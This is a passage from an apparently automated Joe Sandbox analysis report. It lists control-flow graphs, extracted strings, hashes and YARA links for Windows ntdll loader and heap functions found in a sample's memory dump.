680->705 681->680 689 3779ff8e-3779ff97 681->689 693 3779ff30-3779ff51 call 376eb910 GetPEB 682->693 683->693 703 377a0167-377a017b call 376eb910 685->703 686->703 696 3779ff99-3779ffa9 689->696 697 3779ffb8-3779ffbc 689->697 690->645 698 377a01c9-377a01d4 690->698 693->680 723 3779ff57-3779ff6b 693->723 696->697 706 3779ffab-3779ffb5 call 377ad646 696->706 699 3779ffce-3779ffd4 697->699 700 3779ffbe-3779ffcc call 37723ae9 697->700 698->645 707 377a01da-377a01e3 GetPEB 698->707 711 3779ffd7-3779ffe0 699->711 700->711 735 377a017e-377a0188 GetPEB 703->735 704->673 714 377a0089-377a0090 705->714 715 377a0092-377a009a 705->715 706->697 708 377a0202-377a0207 call 376eb910 707->708 709 377a01e5-377a0200 GetPEB call 376eb910 707->709 732 377a020c-377a022c call 3779823a call 376eb910 708->732 709->732 721 3779fff2-3779fff5 711->721 722 3779ffe2-3779fff0 711->722 714->715 725 377a00b8-377a00bc 715->725 726 377a009c-377a00ac 715->726 733 3779fff7-3779fffe 721->733 734 377a0065 721->734 722->721 723->680 729 377a00be-377a00d1 call 37723ae9 725->729 730 377a00ec-377a00f2 725->730 726->725 736 377a00ae-377a00b3 call 377ad646 726->736 748 377a00e3 729->748 749 377a00d3-377a00e1 call 3771fdb9 729->749 741 377a00f5-377a00fc 730->741 732->735 733->734 740 377a0000-377a000b 733->740 734->680 735->645 742 377a018e-377a01a2 735->742 736->725 740->734 746 377a000d-377a0016 GetPEB 740->746 741->704 747 377a00fe-377a010e 741->747 742->645 751 377a0018-377a0033 GetPEB call 376eb910 746->751 752 377a0035-377a003a call 376eb910 746->752 747->704 754 377a00e6-377a00ea 748->754 749->754 760 377a003f-377a005d call 3779823a call 376eb910 751->760 752->760 754->741 760->734
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.3044601272.00000000376C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376C0000, based on PE: true
                                          • Associated: 00000003.00000002.3044601272.00000000377E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000003.00000002.3044601272.00000000377ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_376c0000_ulACwpUCSU.jbxd
                                          Similarity
                                          • API ID: DebugPrintTimes
                                          • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                          • API String ID: 3446177414-1700792311
                                          • Opcode ID: 3a9c2838c8f73a93144f3c782c80ff4f1abb993613ec0b2d6c21822f1864fa30
                                          • Instruction ID: 136fa15e43e9efe0eefee690fbf01a0b0b739790db357ce141c95c1b587d939e
                                          • Opcode Fuzzy Hash: 3a9c2838c8f73a93144f3c782c80ff4f1abb993613ec0b2d6c21822f1864fa30
                                          • Instruction Fuzzy Hash: D0D11135501649DFEB01CFA4C414AAEBBF6FF4A720F048969E444AF752E739A941CF12
                                          Function 376ED2EC Relevance: 12.8, Strings: 10, Instructions: 312COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 1287 376ed2ec-376ed32d 1288 3774a69c 1287->1288 1289 376ed333-376ed335 1287->1289 1291 3774a6a6-3774a6bf call 377abd08 1288->1291 1289->1288 1290 376ed33b-376ed33e 1289->1290 1290->1288 1292 376ed344-376ed34c 1290->1292 1300 3774a6c5-3774a6c8 1291->1300 1301 376ed56a-376ed56d 1291->1301 1294 376ed34e-376ed350 1292->1294 1295 376ed356-376ed3a1 call 37735050 call 37732ab0 1292->1295 1294->1295 1297 3774a5f6-3774a5fb 1294->1297 1310 3774a600-3774a61a call 376e7220 1295->1310 1311 376ed3a7-376ed3b0 1295->1311 1299 376ed5c0-376ed5c8 1297->1299 1304 376ed54d-376ed54f 1300->1304 1303 376ed56f-376ed575 1301->1303 1307 376ed63b-376ed63d 1303->1307 1308 376ed57b-376ed588 GetPEB call 37703bc0 1303->1308 1304->1301 1306 376ed551-376ed564 call 37713262 1304->1306 1306->1301 1327 3774a6cd-3774a6d2 1306->1327 1312 376ed58d-376ed592 1307->1312 1308->1312 1331 3774a624-3774a628 1310->1331 1332 3774a61c-3774a61e 1310->1332 1315 376ed3ba-376ed3cd call 376ed736 1311->1315 1316 376ed3b2-376ed3b4 1311->1316 1319 376ed594-376ed59d call 37732a80 1312->1319 1320 376ed5a1-376ed5a6 1312->1320 1335 3774a658 1315->1335 1336 376ed3d3-376ed3d7 1315->1336 1316->1315 1322 3774a630-3774a63b call 377aad61 1316->1322 1319->1320 1324 376ed5a8-376ed5b1 call 37732a80 1320->1324 1325 376ed5b5-376ed5ba 1320->1325 1322->1315 1345 3774a641-3774a653 1322->1345 1324->1325 1325->1299 1333 3774a6d7-3774a6db call 37732a80 1325->1333 1327->1301 1331->1322 1332->1331 1338 376ed52e 1332->1338 1341 3774a6e0 1333->1341 1350 3774a660-3774a662 1335->1350 1343 376ed3dd-376ed3f7 call 376ed8d0 1336->1343 1344 376ed5cb-376ed623 call 37735050 call 37732ab0 1336->1344 1342 376ed530-376ed535 1338->1342 1341->1341 1346 376ed549 1342->1346 1347 376ed537-376ed539 1342->1347 1343->1350 1355 376ed3fd-376ed44e call 37735050 call 37732ab0 1343->1355 1361 376ed625 1344->1361 1362 376ed642-376ed645 1344->1362 1345->1315 1346->1304 1347->1291 1352 376ed53f-376ed543 1347->1352 1350->1301 1351 3774a668 1350->1351 1357 3774a66d 1351->1357 1352->1291 1352->1346 1355->1335 1367 376ed454-376ed45d 1355->1367 1363 3774a677-3774a67c 1357->1363 1366 376ed62f-376ed636 1361->1366 1362->1338 1363->1307 1366->1342 1367->1357 1368 376ed463-376ed492 call 37735050 call 376ed64a 1367->1368 1368->1366 1373 376ed498-376ed49e 1368->1373 1373->1366 1374 376ed4a4-376ed4aa 1373->1374 1374->1307 1375 376ed4b0-376ed4cc GetPEB call 37705d90 1374->1375 1375->1363 1378 376ed4d2-376ed4ef call 376ed64a 1375->1378 1381 376ed526-376ed52c 1378->1381 1382 376ed4f1-376ed4f6 1378->1382 1381->1303 1381->1338 1383 376ed4fc-376ed524 call 37714ca6 1382->1383 1384 3774a681-3774a686 1382->1384 1383->1381 1384->1383 1385 3774a68c-3774a697 1384->1385 1385->1342
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.3044601272.00000000376C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376C0000, based on PE: true
                                          • Associated: 00000003.00000002.3044601272.00000000377E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000003.00000002.3044601272.00000000377ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_376c0000_ulACwpUCSU.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: @$@$@$Control Panel\Desktop$Control Panel\Desktop\MuiCached$MachinePreferredUILanguages$PreferredUILanguages$PreferredUILanguagesPending$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings$h.q7
                                          • API String ID: 0-3492232232
                                          • Opcode ID: 894d91c6dec00c3ebfd468ed2090953e1fd69af8179322f114162d287066a8d1
                                          • Instruction ID: 62f65c04ac3429abba6d6ce6ac6a1788d80b52cd420837c2ce68817103928336
                                          • Opcode Fuzzy Hash: 894d91c6dec00c3ebfd468ed2090953e1fd69af8179322f114162d287066a8d1
                                          • Instruction Fuzzy Hash: DFB19EB150A341AFD711CF24C590B5FBBE8AB84768F41492EF894EB641DB34D908CBA3
                                          Function 377986C2 Relevance: 12.6, Strings: 10, Instructions: 146COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 1512 377986c2-3779873a GetPEB call 376f0670 1515 37798740-3779875e call 376f42b0 1512->1515 1516 37798892-3779889a 1512->1516 1521 3779877f-37798787 1515->1521 1522 37798760-37798779 call 37737ad0 1515->1522 1518 3779889b-377988b0 call 37734b50 1516->1518 1525 37798789-3779879e call 37724f11 1521->1525 1526 377987b7-377987c0 1521->1526 1522->1516 1522->1521 1525->1516 1533 377987a4-377987ac 1525->1533 1526->1516 1527 377987c6-377987c8 1526->1527 1527->1518 1530 377987ce-377987dc 1527->1530 1532 377987e8-377987ee 1530->1532 1534 377987de-377987e2 1532->1534 1535 377987f0 1532->1535 1533->1516 1536 377987b2 1533->1536 1537 377987f2-377987f4 1534->1537 1538 377987e4-377987e5 1534->1538 1539 3779884f-37798875 call 37724e50 1535->1539 1536->1518 1537->1539 1541 377987f6-377987ff 1537->1541 1538->1532 1539->1518 1544 37798877-37798890 call 37737ad0 1539->1544 1541->1539 1543 37798801-37798803 1541->1543 1545 37798807-3779881b call 37737ad0 1543->1545 1544->1516 1544->1518 1550 37798839 1545->1550 1551 3779881d 1545->1551 1552 3779883d-3779884d 1550->1552 1553 37798820-37798829 1551->1553 1552->1539 1552->1545 1553->1553 1554 3779882b-37798835 1553->1554 1554->1516 1555 37798837 1554->1555 1555->1552
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.3044601272.00000000376C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376C0000, based on PE: true
                                          • Associated: 00000003.00000002.3044601272.00000000377E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000003.00000002.3044601272.00000000377ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_376c0000_ulACwpUCSU.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
                                          • API String ID: 0-2515994595
                                          • Opcode ID: a1d9c1c31410dac5d16c10fb3e702f5672460b3ed0979f7596cfd000480ce3b0
                                          • Instruction ID: ce93905a131253aa013d5cb2267e6d4a37598013c0f4494b35c6b2087c0ec13f
                                          • Opcode Fuzzy Hash: a1d9c1c31410dac5d16c10fb3e702f5672460b3ed0979f7596cfd000480ce3b0
                                          • Instruction Fuzzy Hash: 7A51CEB15153119BE325CF18A844BEBB7E9EF85260F00493DF9688B241E734E604DBA2
                                          Function 376E640D Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 150timeCOMMON
                                          Download Yara Rule
                                          APIs
                                          • RtlDebugPrintTimes.NTDLL ref: 376E651C
                                            • Part of subcall function 376E6565: RtlDebugPrintTimes.NTDLL ref: 376E6614
                                            • Part of subcall function 376E6565: RtlDebugPrintTimes.NTDLL ref: 376E665F
                                          Strings
                                          • apphelp.dll, xrefs: 376E6446
                                          • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 377497B9
                                          • minkernel\ntdll\ldrinit.c, xrefs: 377497A0, 377497C9
                                          • Getting the shim engine exports failed with status 0x%08lx, xrefs: 37749790
                                          • LdrpInitShimEngine, xrefs: 37749783, 37749796, 377497BF
                                          • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 3774977C
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.3044601272.00000000376C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376C0000, based on PE: true
                                          • Associated: 00000003.00000002.3044601272.00000000377E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000003.00000002.3044601272.00000000377ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_376c0000_ulACwpUCSU.jbxd
                                          Similarity
                                          • API ID: DebugPrintTimes
                                          • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                          • API String ID: 3446177414-204845295
                                          • Opcode ID: 1ff873ab3bdfe34d111a037eacceeb3ea32200d329ccc2d9c96dca477c1f6f43
                                          • Instruction ID: 373a890f065d093dccfa596dfd66c9a043bcbbabb199b126f24b43c0c0a0d022
                                          • Opcode Fuzzy Hash: 1ff873ab3bdfe34d111a037eacceeb3ea32200d329ccc2d9c96dca477c1f6f43
                                          • Instruction Fuzzy Hash: 8351EE712583009FE711CF20C9A1BAB77E8FB88654F000929F585AB560EA34E905CFA3
                                          Function 3771D6D0 Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 151timeCOMMON
                                          Download Yara Rule
                                          APIs
                                          • RtlDebugPrintTimes.NTDLL ref: 3771D879
                                            • Part of subcall function 376F4779: RtlDebugPrintTimes.NTDLL ref: 376F4817
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.3044601272.00000000376C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376C0000, based on PE: true
                                          • Associated: 00000003.00000002.3044601272.00000000377E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000003.00000002.3044601272.00000000377ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_376c0000_ulACwpUCSU.jbxd
                                          Similarity
                                          • API ID: DebugPrintTimes
                                          • String ID: $$$$LdrShutdownProcess$Process 0x%p (%wZ) exiting$minkernel\ntdll\ldrinit.c
                                          • API String ID: 3446177414-1975516107
                                          • Opcode ID: 73b6594e54b913c633d24f0f6816c4f3b432ddc032fb16a6890d1c58378efa04
                                          • Instruction ID: 82a68038805628640a58c3b2393b6ce37716fc9ebd5e30d3d7ebc89df6630598
                                          • Opcode Fuzzy Hash: 73b6594e54b913c633d24f0f6816c4f3b432ddc032fb16a6890d1c58378efa04
                                          • Instruction Fuzzy Hash: 3F51BD75A043499FEB04CFA4C88979EBBB2BF48324F244469D400BF691D778A952CF91
                                          Function 3779F51B Relevance: 10.2, Strings: 8, Instructions: 189COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.3044601272.00000000376C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376C0000, based on PE: true
                                          • Associated: 00000003.00000002.3044601272.00000000377E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000003.00000002.3044601272.00000000377ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_376c0000_ulACwpUCSU.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: HEAP: $HEAP[%wZ]: $Invalid CommitSize parameter - %Ix$Invalid ReserveSize parameter - %Ix$May not specify Lock parameter with HEAP_NO_SERIALIZE$Specified HeapBase (%p) != to BaseAddress (%p)$Specified HeapBase (%p) invalid, Status = %lx$Specified HeapBase (%p) is free or not writable
                                          • API String ID: 0-2224505338
                                          • Opcode ID: 3582be61da71f0f43b2bf69ef5cf4da1a2d79f71a3a30c26be5a67d425df8e38
                                          • Instruction ID: 36454babc3a552a5f0045340568998ca6bea1f4fdc7f18ac4a31f625d73d4306
                                          • Opcode Fuzzy Hash: 3582be61da71f0f43b2bf69ef5cf4da1a2d79f71a3a30c26be5a67d425df8e38
                                          • Instruction Fuzzy Hash: 60513636113245EFD301CF54E964F9A73EDEB06A74F1548A9F4059F612CA39ED01CE26
                                          Function 37778633 Relevance: 9.0, Strings: 7, Instructions: 259COMMON
                                          Download Yara Rule
                                          Strings
                                          • HandleTraces, xrefs: 3777890F
                                          • AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 377786E7
                                          • VerifierDlls, xrefs: 3777893D
                                          • AVRF: -*- final list of providers -*- , xrefs: 3777880F
                                          • VerifierFlags, xrefs: 377788D0
                                          • VerifierDebug, xrefs: 37778925
                                          • AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 377786BD
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.3044601272.00000000376C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376C0000, based on PE: true
                                          • Associated: 00000003.00000002.3044601272.00000000377E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000003.00000002.3044601272.00000000377ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_376c0000_ulACwpUCSU.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
                                          • API String ID: 0-3223716464
                                          • Opcode ID: 54d31c68e5a801a504ea0e13c5b0c9abb816a1ab15255a4e8cf7a1cc24c7249a
                                          • Instruction ID: 4e05b8ef4e1de3888575cf0712d5c4d3d564ad4535d0b9a3d1ad804443e0400c
                                          • Opcode Fuzzy Hash: 54d31c68e5a801a504ea0e13c5b0c9abb816a1ab15255a4e8cf7a1cc24c7249a
                                          • Instruction Fuzzy Hash: 759121B2A51391AFEB11CF64C890B3AB7A9EF40764F450968F940AF650C738AC15DF93
                                          Function 3771237A Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 111COMMON
                                          Download Yara Rule
                                          Strings
                                          • minkernel\ntdll\ldrinit.c, xrefs: 3775A7AF
                                          • DGl7, xrefs: 37712382
                                          • LdrpDynamicShimModule, xrefs: 3775A7A5
                                          • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 3775A79F
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.3044601272.00000000376C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376C0000, based on PE: true
                                          • Associated: 00000003.00000002.3044601272.00000000377E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000003.00000002.3044601272.00000000377ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_376c0000_ulACwpUCSU.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: DGl7$Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$minkernel\ntdll\ldrinit.c
                                          • API String ID: 0-2862758056
                                          • Opcode ID: 4b771b48b1bedd70a91b68685c2b3e7bf596c008abade72487ba85fee91ae0de
                                          • Instruction ID: 2c287bb696cc88a11fdf95717681015f87b7ec1ce33a19746069a2ddd7a460cf
                                          • Opcode Fuzzy Hash: 4b771b48b1bedd70a91b68685c2b3e7bf596c008abade72487ba85fee91ae0de
                                          • Instruction Fuzzy Hash: 20315976A50200EFEB108F18C8C5B6E7BB9FB88B70F150479E900BF660DB786952CB51
                                          Function 376EF113 Relevance: 8.2, Strings: 6, Instructions: 684COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.3044601272.00000000376C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376C0000, based on PE: true
                                          • Associated: 00000003.00000002.3044601272.00000000377E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000003.00000002.3044601272.00000000377ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_376c0000_ulACwpUCSU.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: (!TrailingUCR)$((LONG)FreeEntry->Size > 1)$(LONG)FreeEntry->Size > 1$(UCRBlock != NULL)$HEAP: $HEAP[%wZ]:
                                          • API String ID: 0-523794902
                                          • Opcode ID: ab120d61eba8cdea3e06dd0ea1542f852d6105cf9a4296f0c55c6b9c61eaa250
                                          • Instruction ID: d5b3b32e3d2a7f3caa03fc3e0d165d59005a2d64c234f732b84d52706efbbaa2
                                          • Opcode Fuzzy Hash: ab120d61eba8cdea3e06dd0ea1542f852d6105cf9a4296f0c55c6b9c61eaa250
                                          • Instruction Fuzzy Hash: 8A421074206381CFD305CF24C9A4BAAB7EAFF88294F04496DE495CBB51DB34E945CB62
                                          Function 3772631F Relevance: 7.8, Strings: 6, Instructions: 261COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.3044601272.00000000376C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376C0000, based on PE: true
                                          • Associated: 00000003.00000002.3044601272.00000000377E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000003.00000002.3044601272.00000000377ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_376c0000_ulACwpUCSU.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                          • API String ID: 0-792281065
                                          • Opcode ID: 2f2cd691c72df184a60f041cefdec0e61439abdcd9407a84f34659c211cd8228
                                          • Instruction ID: ef7550495c8d3971410ea86ed4992beda71e2d7257357c879d77ef3f72d5c32f
                                          • Opcode Fuzzy Hash: 2f2cd691c72df184a60f041cefdec0e61439abdcd9407a84f34659c211cd8228
                                          • Instruction Fuzzy Hash: 87914870A15325DFEB24DF10CC4DBAA77A1EF05778F10006AE915BFA91DB789812CB92
                                          Function 3772C5C6 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                                          Download Yara Rule
                                          Strings
                                          • LdrpInitializeProcess, xrefs: 3772C5E4
                                          • minkernel\ntdll\ldrinit.c, xrefs: 3772C5E3
                                          • minkernel\ntdll\ldrredirect.c, xrefs: 37767F8C, 37768000
                                          • LdrpInitializeImportRedirection, xrefs: 37767F82, 37767FF6
                                          • Loading import redirection DLL: '%wZ', xrefs: 37767F7B
                                          • Unable to build import redirection Table, Status = 0x%x, xrefs: 37767FF0
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.3044601272.00000000376C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376C0000, based on PE: true
                                          • Associated: 00000003.00000002.3044601272.00000000377E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000003.00000002.3044601272.00000000377ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_376c0000_ulACwpUCSU.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                                          • API String ID: 0-475462383
                                          • Opcode ID: 72adbe645d9416dcf943f2b78d471ed59b0fea8b6951662c5a5e5a770ad507d6
                                          • Instruction ID: 94ecdc372e28e561a2e882abc30aa85d19f7a5dd2f84330e1562856b0fc53d25
                                          • Opcode Fuzzy Hash: 72adbe645d9416dcf943f2b78d471ed59b0fea8b6951662c5a5e5a770ad507d6
                                          • Instruction Fuzzy Hash: 103125716143429FC314DF29D859E6B77D5EF89B64F0009A8F884AF291E724EC05CBA3
                                          Function 37722594 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                                          Download Yara Rule
                                          Strings
                                          • SXS: %s() passed the empty activation context, xrefs: 37761F6F
                                          • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 37761F82
                                          • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 37761FC9
                                          • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 37761F8A
                                          • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 37761FA9
                                          • RtlGetAssemblyStorageRoot, xrefs: 37761F6A, 37761FA4, 37761FC4
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.3044601272.00000000376C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376C0000, based on PE: true
                                          • Associated: 00000003.00000002.3044601272.00000000377E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000003.00000002.3044601272.00000000377ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_376c0000_ulACwpUCSU.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                          • API String ID: 0-861424205
                                          • Opcode ID: 3aaa89a8f5dde2a2afeacb34acddadb47fc85177b74ba41c8d2b27aec137b2c9
                                          • Instruction ID: fd641d42808e6d5b9c502fffd4dd340c7dfece18a4bde6d1467249ff9e2f01e0
                                          • Opcode Fuzzy Hash: 3aaa89a8f5dde2a2afeacb34acddadb47fc85177b74ba41c8d2b27aec137b2c9
                                          • Instruction Fuzzy Hash: AE310776E012287FEB108A858C58FAB77699F41B68F414499FA107F644C770FE00DAE6
                                          Function 37700680 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 414COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.3044601272.00000000376C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376C0000, based on PE: true
                                          • Associated: 00000003.00000002.3044601272.00000000377E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000003.00000002.3044601272.00000000377ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_376c0000_ulACwpUCSU.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                          • API String ID: 0-4253913091
                                          • Opcode ID: ac22d0f6f5ec2de814fdb5f66cb3c62490b5acd9798a7881894658a6e52585c9
                                          • Instruction ID: db275b63038fc35a55ae185ec0baab723f3bbafadcbb488e80f7784f35ccee7c
                                          • Opcode Fuzzy Hash: ac22d0f6f5ec2de814fdb5f66cb3c62490b5acd9798a7881894658a6e52585c9
                                          • Instruction Fuzzy Hash: 23F18774A00609DFEB14CF68C894B6AB7F6FB44364F1485A9E4199F381DB38E981CF91
                                          Function 37719723 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 179timeCOMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.3044601272.00000000376C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376C0000, based on PE: true
                                          • Associated: 00000003.00000002.3044601272.00000000377E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000003.00000002.3044601272.00000000377ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_376c0000_ulACwpUCSU.jbxd
                                          Similarity
                                          • API ID: DebugPrintTimes
                                          • String ID: LdrpUnloadNode$Unmapping DLL "%wZ"$minkernel\ntdll\ldrsnap.c
                                          • API String ID: 3446177414-2283098728
                                          • Opcode ID: f05366d0b9d8022f87e8e4a2fe7a2e09a7f6b5c7ab73c7ce4344e94fe45d0e96
                                          • Instruction ID: 6068487a71dde0df4add6d96f3cbf65260f43553e722d9ae5c2130bf419c154f
                                          • Opcode Fuzzy Hash: f05366d0b9d8022f87e8e4a2fe7a2e09a7f6b5c7ab73c7ce4344e94fe45d0e96
                                          • Instruction Fuzzy Hash: AB51F2716103419FE710DF38C888B2977A6BF88724F140A6DE4529FA91DB38A856CF93
                                          Function 3772C640 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 141timeCOMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          • Failed to reallocate the system dirs string !, xrefs: 377680E2
                                          • minkernel\ntdll\ldrinit.c, xrefs: 377680F3
                                          • LdrpInitializePerUserWindowsDirectory, xrefs: 377680E9
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.3044601272.00000000376C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376C0000, based on PE: true
                                          • Associated: 00000003.00000002.3044601272.00000000377E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000003.00000002.3044601272.00000000377ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_376c0000_ulACwpUCSU.jbxd
                                          Similarity
                                          • API ID: DebugPrintTimes
                                          • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                          • API String ID: 3446177414-1783798831
                                          • Opcode ID: eab92986a2c32df85dc34f1cbb9301db2427080528bab09476ec1ca9ff9adb15
